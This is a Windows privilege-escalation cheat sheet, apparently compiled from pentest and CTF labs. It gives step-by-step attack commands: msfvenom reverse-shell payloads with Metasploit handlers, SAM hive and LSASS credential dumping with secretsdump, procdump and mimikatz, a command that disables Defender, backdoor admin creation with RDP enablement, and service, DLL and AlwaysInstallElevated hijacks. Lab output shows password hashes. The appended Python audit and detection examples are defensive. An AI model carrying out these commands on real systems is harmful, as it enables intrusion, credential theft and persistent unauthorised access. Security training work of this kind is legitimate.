Windows Privilege Escalation

Resources

  • HackTricks
  • Fuzzy Security

Windows 10 Exploits:

  • https://github.com/nu11secur1ty/Windows10Exploits

Low Hanging Fruit

Reference

whoami /priv
SeImpersonatePrivilege -> PrintSpoofer, Juicy Potato, Rogue Potato, Hot Potato
SeAssignPrimaryTokenPrivilege -> Juicy Potato
SeTakeOwnershipPrivilege -> become the owner of any object and modify its DACL to grant yourself access
SeBackupPrivilege -> copy the SAM and SYSTEM hives and dump the hashes offline with impacket's secretsdump.py


If the machine is Windows 10 1809 / Windows Server 2019 or newer - try Rogue Potato
If the machine is older than Windows 10 1809 / Windows Server 2019 - try Juicy Potato
  • Check the current tokens you have and any ability to escalate from your tokens

  • https://github.com/gtworek/Priv2Admin
  • https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation

SeBackupPrivilege

getprivs

Privilege Information for cicada.htb.exe (PID: 3848)
----------------------------------------------------

Process Integrity Level: High

Name                          	Description                    	Attributes
====                          	===========                    	==========
SeBackupPrivilege             	Back up files and directories  	Enabled, Enabled by Default
SeRestorePrivilege            	Restore files and directories  	Enabled, Enabled by Default
SeShutdownPrivilege           	Shut down the system           	Enabled, Enabled by Default
SeChangeNotifyPrivilege       	Bypass traverse checking       	Enabled, Enabled by Default
SeIncreaseWorkingSetPrivilege 	Increase a process working set 	Enabled, Enabled by Default
  • Back up the SAM and SYSTEM registry hives

cmd /c "reg save HKLM\SAM SAM & reg save HKLM\SYSTEM SYSTEM"
  • Download the two files and run impacket's secretsdump.py against them

python3 /opt/impacket/examples/secretsdump.py -sam SAM -system SYSTEM LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Search for files with passwords in them

  • Perform a basic search

#in one shot, may take a while
findstr /SI /M "password" *.xml *.ini *.txt
#separate commands
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

dir c:\*password* /s
dir c:\*pass* /s
dir c:\*login* /s
dir c:\*finance* /s
dir c:\*.key /s
dir c:\*.ica /s
dir c:\*.pwd* /s
dir c:\*.config* /s
dir c:\*access* /s

# PowerShell searches for Office documents
Get-ChildItem -Path "C:\Users" -Filter *.doc -Recurse
Get-ChildItem -Path "C:\Users" -Filter *.xlsx -Recurse
Get-ChildItem -Path "C:\Users" -Filter *.xls -Recurse
  • Find credential-related files and .config files by name

dir /s *pass* == *cred** == *vnc* == *.config*
  • Search every file for the string "password"

findstr /spin "password" *.*

Unattended Setup

  • Unattended Setup is the method by which original equipment manufacturers (OEMs), corporations, and other users install Windows NT in unattended mode. The answer files it leaves behind can contain user passwords, stored base64-encoded. Check the following locations:

  • Password files that could have base64 encoded credentials

Unattended files
dir C:\Windows\sysprep\sysprep.xml
dir C:\Windows\sysprep\sysprep.inf
dir C:\Windows\sysprep.inf
dir C:\Windows\Panther\Unattended.xml
dir C:\Windows\Panther\Unattend.xml
dir C:\Windows\Panther\Unattend\Unattend.xml
dir C:\Windows\Panther\Unattend\Unattended.xml
dir C:\Windows\System32\Sysprep\unattend.xml
dir C:\Windows\System32\Sysprep\unattended.xml
dir C:\unattend.txt
dir C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

dir C:\*.vnc.ini /s /b
dir C:\*ultravnc.ini /s /b
dir C:\ /s /b | findstr /si *vnc.ini

Search Registry for Passwords

reg query HKLM /f password /t REG_SZ /s      #admin needed
reg query HKCU /f password /t REG_SZ /s

Powershell

powershell.exe -nop -ep bypass    
Get-ExecutionPolicy    
Set-ExecutionPolicy Unrestricted   
Set-MpPreference -DisableRealtimeMonitoring $true   
  • Powershell history

  • Windows PowerShell (through the PSReadline module) saves previous commands into a file called ConsoleHost_history.txt, located at:

dir %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Windows Kernel Versions

  • systeminfo

Kernel 6.1 - Windows 7 / Windows Server 2008 R2  
Kernel 6.2 - Windows 8 / Windows Server 2012  
Kernel 6.3 - Windows 8.1 / Windows Server 2012 R2  
Kernel 10 - Windows 10 / Windows Server 2016 / Windows Server 2019 / Windows 11 / Windows Server 2022

Important Files

dir %SYSTEMROOT%\System32\drivers\etc\hosts                   #local DNS entries 
dir %SYSTEMROOT%\System32\drivers\etc\networks                #network config
dir %SYSTEMROOT%\Prefetch                                     #prefetch dir, exe logs
dir %WINDIR%\system32\config\AppEvent.Evt                     #application logs
dir %WINDIR%\system32\config\SecEvent.Evt                     #security logs

Scripts

You might want to check for AV first! Scripts Reference

  • winPEAS
  • Other compiled binaries
  • nishang
  • JAWS
  • PowerSploit
  • PrivEscCheck
  • Windows Exploit Suggester (Next-Generation)
  • Sherlock
  • Priv2Admin (OS privileges to system)

Compiled scripts here

Run PowerUp

. .\PowerUp.ps1
Invoke-AllChecks

Kernel Exploits

  • https://github.com/SecWiki/windows-kernel-exploits

Admin Service that a Standard User can run

  • https://www.youtube.com/watch?v=3BQKpPNlTSo

Run Executable in Background

start /B program

Disable/Enable Group Policy

  • Disable:

REG add "HKCU\Software\Policies\Microsoft\MMC\{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}" /v Restrict_Run /t REG_DWORD /d 1 /f
  • Enable:

REG add "HKCU\Software\Policies\Microsoft\MMC\{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}" /v Restrict_Run /t REG_DWORD /d 0 /f

Add Admin and Enable RDP

net user /add hacked Password1
net localgroup administrators hacked /add
net localgroup Administrateurs hacked /add      #French-localized target
net localgroup "Remote Desktop Users" hacked /add
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service type = REMOTEDESKTOP mode = ENABLE scope = CUSTOM addresses = 10.0.0.1

SMB File Transfer

  • On kali box:

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
  • On Windows (update the IP address with your Kali IP):

copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe

xfreerdp

xfreerdp /v:10.10.25.227 /u:Wade /p:parzival /cert:ignore /drive:/usr/share/windows-resources,share /dynamic-resolution
proxychains -f proxy9051.conf xfreerdp +clipboard /v:10.10.120.5 /d:RLAB /u:'SQL01$' /pth:47b071ssddff02d0f06770137996c /sec:nla /cert:ignore /drive:/home/kali/Documents/htb/rasta/map,share

Credit

  • Taken from Tib3rius

Basic Enumeration

  • Find out the users on the box and enumerate their privileges

net users
net users Administrator

Registry Escalation - Autoruns

  • Detection

  • Open command prompt and type:

C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
  • In Autoruns, click on the Logon tab.

  • From the listed results, notice that the “My Program” entry is pointing to

C:\Program Files\Autorun Program\program.exe
  • In command prompt type:

C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"
  • From the output, notice that the "Everyone" user group has "FILE_ALL_ACCESS" permission on the "program.exe" file.

  • Exploitation

  • Kali VM

  • Open command prompt and type: msfconsole

  • In Metasploit (msf > prompt) type: use multi/handler

  • In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp or windows/x64/shell/reverse_tcp

  • In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]

  • In Metasploit (msf > prompt) type: run

  • Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe

  • Copy the generated file, program.exe, to the Windows VM.

  • Windows VM

  • Place program.exe in C:\Program Files\Autorun Program

  • To simulate the privilege escalation effect, logoff and then log back on as an administrator user.

  • Kali VM

  • Wait for a new session to open in Metasploit.

  • In Metasploit (msf > prompt) type: sessions -i [Session ID]

  • To confirm that the attack succeeded, in Metasploit (msf > prompt) type: getuid

Registry Escalation - AlwaysInstallElevated

  • Detection

  • Windows VM

  • Open command prompt and type:

reg query HKLM\Software\Policies\Microsoft\Windows\Installer
  • From the output, notice that AlwaysInstallElevated value is 1.

  • In command prompt type:

reg query HKCU\Software\Policies\Microsoft\Windows\Installer
  • From the output, notice that AlwaysInstallElevated value is 1.

  • Exploitation

  • Kali VM

  • Open command prompt and type: msfconsole

  • In Metasploit (msf > prompt) type: use multi/handler

  • In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp or windows/shell_reverse_tcp

  • In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]

  • In Metasploit (msf > prompt) type: run

  • Open an additional command prompt and type:

msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi
  • Copy the generated file, setup.msi, to the Windows VM.

Windows VM

  • Place setup.msi in C:\Temp.

  • Open command prompt and type:

msiexec /quiet /qn /i C:\Temp\setup.msi

Service Escalation via Changing binpath

  • Query the interesting service

sc.exe qc IObitUnSvr
SERVICE_NAME: IObitUnSvr
        TYPE               : 10  WIN32_OWN_PROCESS 
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : 
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : IObit Uninstaller Service
        DEPENDENCIES       : 
        SERVICE_START_NAME : LocalSystem
  • You notice that you cannot swap out the legitimate exe or modify the directory it lives in; however, you can edit the binPath

sc.exe config IObitUnSvr binPath= "C:\Users\dharding\Desktop\sliver.exe"
[SC] ChangeServiceConfig SUCCESS
PS C:\Windows\System32\spool\drivers\color> sc.exe start IObitUnSvr
sc.exe start IObitUnSvr
# get session
[*] Session 12b37889 dante-dc01 - 10.10.14.2:52042 (LOCAL-WS02) - windows/amd64 - Tue, 07 May 2024 18:18:15 EDT

Startup Applications

  • Detection

  • Windows VM

  • Open command prompt and type:

icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
  • From the output notice that the BUILTIN\Users group has full access (F) to the directory.

  • Exploitation

  • Kali VM

  • Open command prompt and type: msfconsole

  • In Metasploit (msf > prompt) type: use multi/handler

  • In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp or windows/shell_reverse_tcp

  • In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]

  • In Metasploit (msf > prompt) type: run

  • Open another command prompt and type: msfvenom -p windows/shell_reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe

  • Copy the generated file, x.exe, to the Windows VM.

  • Windows VM

  • Place x.exe in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

  • Logoff.

  • Login with the administrator account credentials.

  • Kali VM

  • Wait for a session to be created, it may take a few seconds.

  • In Meterpreter (meterpreter > prompt) type: getuid or whoami

  • From the output, notice the user is User-PC\Admin

DLL Hijacking

  • Detection

  • Windows VM

  • Open the Tools folder that is located on the desktop and then go to the Process Monitor folder.

  • In reality, executables would be copied from the victim’s host over to the attacker’s host for analysis during run time.

  • Alternatively, the same software can be installed on the attacker’s host for analysis, in case they can obtain it. To simulate this, right click on Procmon.exe and select Run as administrator from the menu.

  • In procmon, select filter. From the left-most drop down menu, select Process Name.

  • In the input box on the same line type: dllhijackservice.exe

  • Make sure the line reads Process Name is dllhijackservice.exe then Include and click on the Add button, then Apply and lastly on OK.

  • Next, select from the left-most drop down menu Result.

  • In the input box on the same line type: NAME NOT FOUND

  • Make sure the line reads Result is NAME NOT FOUND then Include and click on the Add button, then Apply and lastly on OK.

  • Open command prompt and type:

sc start dllsvc
  • Scroll to the bottom of the window. One of the highlighted results shows that the service tried to execute C:\Temp\hijackme.dll yet it could not do that as the file was not found. Note that C:\Temp is a writable location.

  • Exploitation

  • Windows VM

  • Copy C:\Users\User\Desktop\Tools\Source\windows_dll.c to the Kali VM.

  • Kali VM

  • Open windows_dll.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add

  • Exit the text editor and compile the file by typing the following in the command prompt: x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll

  • Copy the generated file hijackme.dll, to the Windows VM.

  • Windows VM

  • Place hijackme.dll in C:\Temp.

  • Open command prompt and type: sc stop dllsvc & sc start dllsvc

  • It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt:

net localgroup administrators

Service Escalation - binPath

  • Detection

  • Windows VM

  • Open command prompt and type:

C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc
  • Notice that the output suggests that the user User-PC\User has the SERVICE_CHANGE_CONFIG permission.

  • Exploitation

  • Windows VM

  • In command prompt type: sc config daclsvc binpath= "net localgroup administrators user /add"

  • In command prompt type: sc start daclsvc

  • It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

Unquoted Service Path

  • Find vulnerable services with this command (no PowerUp needed)

Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
  • Open command prompt and type: sc qc unquotedsvc

  • Notice that the BINARY_PATH_NAME field displays a path that is not confined between quotes.

  • Exploitation

  • Kali VM

  • Open command prompt and type: msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe

  • Copy the generated file, common.exe, to the Windows VM.

  • Windows VM

  • Place common.exe in "C:\Program Files\Unquoted Path Service".

  • Open command prompt and type: sc start unquotedsvc

  • It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
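Added example, not from the original page: Python logic that applies the same filter as the Get-CIMInstance query above to service records and lists, for each unquoted path, the directories whose ACLs an administrator should verify with icacls. The service names and paths are constructed, modelled on the lab's "Unquoted Path Service" directory.

```python
import ntpath

WINDOWS_DIR = "c:\\windows"

def probe_paths(path_name):
    """Executables CreateProcess tries, in order, before the intended binary of an
    unquoted service path: each space in the path yields one shorter candidate."""
    path_name = path_name.strip()
    if not path_name or path_name.startswith('"'):
        return []                       # quoted path: no ambiguity, nothing to probe
    tokens = path_name.split(" ")
    # The binary ends at the first token with an .exe extension; later tokens are arguments.
    end = next((i for i, t in enumerate(tokens) if t.lower().endswith(".exe")), len(tokens) - 1)
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, end + 1)]

def directories_to_audit(path_name):
    """Directories whose ACL must deny write to ordinary users, or a probe path could be planted."""
    return sorted({ntpath.dirname(p) for p in probe_paths(path_name)})

def audit_services(records):
    """Apply the page's filter (Auto start, outside C:\\Windows, unquoted) to
    (Name, PathName, StartMode) records; return {service: directories to check with icacls}."""
    report = {}
    for name, path_name, start_mode in records:
        p = path_name.strip()
        if start_mode != "Auto" or p.lower().startswith(WINDOWS_DIR) or p.startswith('"'):
            continue
        dirs = directories_to_audit(p)
        if dirs:
            report[name] = dirs
    return report

# Constructed records shaped like the Get-CIMInstance output above; the first one mirrors
# the lab's "Unquoted Path Service" directory, the others are controls.
SAMPLE_SERVICES = [
    ("unquotedsvc", r"C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe", "Auto"),
    ("daclsvc",     r'"C:\Program Files\DACL Service\daclservice.exe"', "Auto"),
    ("Spooler",     r"C:\Windows\System32\spoolsv.exe", "Auto"),
    ("manualsvc",   r"C:\Program Files\Some Tool\tool.exe -service", "Manual"),
    ("plainsvc",    r"C:\Tools\svc.exe", "Auto"),
]

if __name__ == "__main__":
    for service, dirs in audit_services(SAMPLE_SERVICES).items():
        print(service, "->", "; ".join(dirs))
```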

Hot Potato

  • Exploitation

  • Windows VM

  • In command prompt type: powershell.exe -nop -ep bypass

  • In PowerShell prompt type: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1

  • In PowerShell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"

  • To confirm that the attack was successful, in PowerShell prompt type: net localgroup administrators

Password Mining Escalation - Configuration Files

  • Exploitation

  • Windows VM

  • Open command prompt and type: notepad C:\Windows\Panther\Unattend.xml

  • Scroll down to the "<Password>" property and copy the base64 string that is confined between the "<Value>" tags underneath it.

  • Kali VM

  • In a terminal, type: echo [copied base64] | base64 -d

  • Notice the cleartext password
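Added example (not part of the original cheat sheet): a small Python audit script that finds the password elements in an unattend/sysprep answer file like the ones listed under Unattended Setup and decodes them the way the base64 step above does. The sample XML is constructed; the UTF-16LE plus element-name suffix handling follows how Windows stores values written with PlainText false, and a value that is plain base64 of UTF-8 (as in the lab file) is handled too.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed answer file (not from a real host). The LocalAccount value is stored the way
# Windows writes it for <PlainText>false</PlainText>: Base64(UTF-16LE(password + element name)).
SAMPLE_UNATTEND = """<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem"><component name="Microsoft-Windows-Shell-Setup">
    <UserAccounts><LocalAccounts><LocalAccount>
      <Name>User</Name>
      <Password><Value>{}</Value><PlainText>false</PlainText></Password>
    </LocalAccount></LocalAccounts></UserAccounts>
    <AutoLogon>
      <Username>Admin</Username>
      <Password><Value>Summer2024!</Value><PlainText>true</PlainText></Password>
    </AutoLogon>
  </component></settings>
</unattend>""".format(base64.b64encode("P@ssw0rd1Password".encode("utf-16-le")).decode())

PASSWORD_TAGS = ("Password", "AdministratorPassword")

def _child_text(elem, name):
    """Text of the first child whose tag (namespace stripped) equals name, else None."""
    for child in elem:
        if child.tag.split("}")[-1] == name:
            return (child.text or "").strip()
    return None

def decode_value(value, tag):
    """Undo the answer-file encoding: base64, then UTF-16LE, then the trailing element name."""
    raw = base64.b64decode(value)
    # Windows writes UTF-16LE (odd bytes are 0 for ASCII); a hand-made file may be plain UTF-8.
    if raw and len(raw) % 2 == 0 and not any(raw[1::2]):
        text = raw.decode("utf-16-le")
    else:
        text = raw.decode("utf-8", errors="replace")
    return text[:-len(tag)] if text.endswith(tag) else text

def find_credentials(xml_text):
    """Return [{'account', 'password', 'plaintext'}] for every <Password>/<AdministratorPassword>."""
    root = ET.fromstring(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        tag = elem.tag.split("}")[-1]
        value = _child_text(elem, "Value") if tag in PASSWORD_TAGS else None
        if value is None:
            continue
        # Assumption: a missing <PlainText> element means the value is in clear.
        plaintext = (_child_text(elem, "PlainText") or "true").lower() == "true"
        owner = parents[elem]
        account = ("Administrator" if tag == "AdministratorPassword" else
                   _child_text(owner, "Name") or _child_text(owner, "Username") or "?")
        findings.append({"account": account, "plaintext": plaintext,
                         "password": value if plaintext else decode_value(value, tag)})
    return findings
```

Run it against the files found by the dir commands above; any non-empty result is a credential that should be rotated and the answer file removed from the image.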

Password Mining Escalation - Memory

  • Exploitation

  • Kali VM

  • Open command prompt and type: msfconsole

  • In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic

  • In Metasploit (msf > prompt) type: set uripath x

  • In Metasploit (msf > prompt) type: run

  • Windows VM

  • Open Internet Explorer and browse to: http://[Kali VM IP Address]/x

  • Open command prompt and type: taskmgr

  • In Windows Task Manager, right-click on iexplore.exe in the Image Name column and select Create Dump File from the popup menu.

  • Copy the generated file, iexplore.DMP, to the Kali VM.

  • Kali VM

  • Place iexplore.DMP on the desktop.

  • Open command prompt and type: strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"

  • Copy the Base64 encoded string.

  • In command prompt type: echo -ne [Base64 String] | base64 -d

  • Notice the credentials in the output.

Kernel Exploits

  • Establish a shell

  • Kali VM

  • Open command prompt and type: msfconsole

  • In Metasploit (msf > prompt) type: use multi/handler

  • In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp

  • In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]

  • In Metasploit (msf > prompt) type: run

  • Open an additional command prompt and type: msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe > shell.exe

  • Copy the generated file, shell.exe, to the Windows VM.

  • Windows VM

  • Execute shell.exe to obtain a reverse shell

  • Detection & Exploitation

  • Kali VM

  • In Metasploit (msf > prompt) type: run post/multi/recon/local_exploit_suggester

  • Identify exploit/windows/local/ms16_014_wmi_recv_notif as a potential privilege escalation

  • In Metasploit (msf > prompt) type: use exploit/windows/local/ms16_014_wmi_recv_notif

  • In Metasploit (msf > prompt) type: set SESSION [meterpreter SESSION number]

  • In Metasploit (msf > prompt) type: set LPORT 5555

  • In Metasploit (msf > prompt) type: run

LSASS Credential Dumping

  • Use procdump:

procdump.exe -accepteula -ma lsass.exe C:\Users\Administrator\Desktop\lsass.dmp
#either exfil or perform locally 
mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonpasswords
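Added example for the defender side, not part of the original page: the process command lines used in several sections of this sheet (reg save of the hives, sc config binPath=, quiet msiexec install, net localgroup /add, procdump on lsass, fDenyTSConnections, Set-MpPreference) turned into regex detections and run over a constructed log sample. The log format (timestamp|user|command line), user names and timestamps are constructed.

```python
import re

# Constructed process-creation events (timestamp|user|command line), not real telemetry.
# Each command line echoes a step from this page; the notepad line is a benign control.
SAMPLE_EVENTS = [
    r'2024-05-07T18:18:15Z|WS02\alice|cmd /c "reg save HKLM\SAM SAM & reg save HKLM\SYSTEM SYSTEM"',
    r'2024-05-07T18:19:02Z|WS02\alice|sc.exe config IObitUnSvr binPath= "C:\Users\alice\Desktop\svc.exe"',
    r'2024-05-07T18:20:40Z|WS02\alice|msiexec /quiet /qn /i C:\Temp\setup.msi',
    r'2024-05-07T18:21:11Z|NT AUTHORITY\SYSTEM|net localgroup administrators hacked /add',
    r'2024-05-07T18:22:00Z|WS02\bob|notepad.exe C:\notes.txt',
    r'2024-05-07T18:23:30Z|WS02\admin|procdump.exe -accepteula -ma lsass.exe C:\Users\admin\Desktop\lsass.dmp',
    r'2024-05-07T18:24:05Z|WS02\alice|reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    r'2024-05-07T18:25:48Z|WS02\alice|powershell.exe -nop -ep bypass Set-MpPreference -DisableRealtimeMonitoring $true',
]

# (rule name, regex) pairs, one per technique on this page. Case-insensitive because cmd.exe
# and reg.exe accept any casing; \b anchors avoid matching inside longer words.
RULES = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in [
    ("hive_backup",      r"\breg(?:\.exe)?\s+save\s+HKLM\\(?:SAM|SYSTEM|SECURITY)\b"),
    ("service_binpath",  r"\bsc(?:\.exe)?\s+config\s+\S+\s+binpath="),
    ("quiet_msi",        r"\bmsiexec(?:\.exe)?\b(?=.*\s/(?:quiet|qn)\b)(?=.*\s/i\b)"),
    ("local_admin_add",  r'\bnet1?(?:\.exe)?\s+localgroup\s+"?(?:administrators|administrateurs|remote desktop users)"?\s+\S+\s+/add\b'),
    ("lsass_dump",       r"\bprocdump(?:64)?(?:\.exe)?\b.*\blsass(?:\.exe)?\b"),
    ("rdp_enable",       r"\bfDenyTSConnections\b.*\s/d\s+0\b"),
    ("defender_disable", r"\bSet-MpPreference\b.*-DisableRealtimeMonitoring\s+\$?true\b"),
]]

def detect(events):
    """Return (timestamp, user, rule_name) for each event whose command line matches a rule."""
    hits = []
    for event in events:
        timestamp, user, command_line = event.split("|", 2)
        for name, pattern in RULES:
            if pattern.search(command_line):
                hits.append((timestamp, user, name))
    return hits

if __name__ == "__main__":
    for timestamp, user, name in detect(SAMPLE_EVENTS):
        print(f"{timestamp} {user:<22} {name}")
```

The quiet_msi rule is noisy on its own in environments that deploy software by MSI; correlate it with the two AlwaysInstallElevated registry values shown earlier before treating it as escalation.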
